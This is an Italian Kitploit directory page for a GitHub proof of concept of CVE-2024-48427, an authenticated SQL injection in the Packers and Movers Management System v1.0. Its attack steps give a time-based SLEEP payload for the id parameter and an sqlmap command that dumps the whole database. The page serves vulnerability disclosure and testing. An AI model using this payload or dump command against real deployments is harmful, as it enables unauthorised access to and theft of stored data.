Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-48427 | Kitploit
Strumenti/GitHubGitHub/vighneshnair7/cve-2024-48427
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingSicurezza dei Database
GitHubvighneshnair7/cve-2024-48427

CVE-2024-48427

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-48427

Descrizione

Una vulnerabilità di SQL injection in Sourcecodesters Packers and Movers Management System v1.0 consente a utenti remoti autenticati di eseguire comandi SQL arbitrari tramite il parametro id in /mpms/admin/?page=services/manage_service&id

Tipo di vulnerabilità

SQL Injection

Vendor del prodotto

Sourcecodesters

Base di codice del prodotto interessato:

https://www.sourcecodesters.com/php/15360/packers-and-movers-management-system-phpoop-free-source-code.html - 1.0

Componente interessato:

Il parametro id di Update Service Details in /mpms/admin/?page=services/manage_service&id

Vettori di attacco:

  1. Installare l'applicazione localmente e accedere al pannello di amministrazione utilizzando le credenziali predefinite fornite.
  2. Navigare alla pagina vulnerabile: http://localhost/mpms/admin/?page=services/manage_service&id=2
  3. Iniettare il payload SQL nel parametro id: http://localhost/mpms/admin/?page=services/manage_service&id=1' OR SLEEP(5)-- puNr
  4. Osservare la risposta dell'applicazione: la pagina dovrebbe impiegare notevolmente più tempo (5 secondi) a caricarsi se l'iniezione ha successo, confermando che il parametro id è vulnerabile alla SQL injection.
  5. Eseguire ora lo strumento SQLMap per il dump dei dettagli del database:
  6. sqlmap -u "http://localhost/mpms/admin/?page=services/manage_service&id=1" --cookie="phpMyAdmin=ju34bd3d8q0jdf6td4ntqscaqd;PHPSESSID=eopn8q1p8c1f5m1v5igjoir8k1;" --dbms mysql -p id --risk 3 --level 4 --dbs --dump

Riferimenti:

  1. https://owasp.org/www-community/attacks/SQL_Injection
  2. https://portswigger.net/web-security/sql-injection
Scarica lo strumento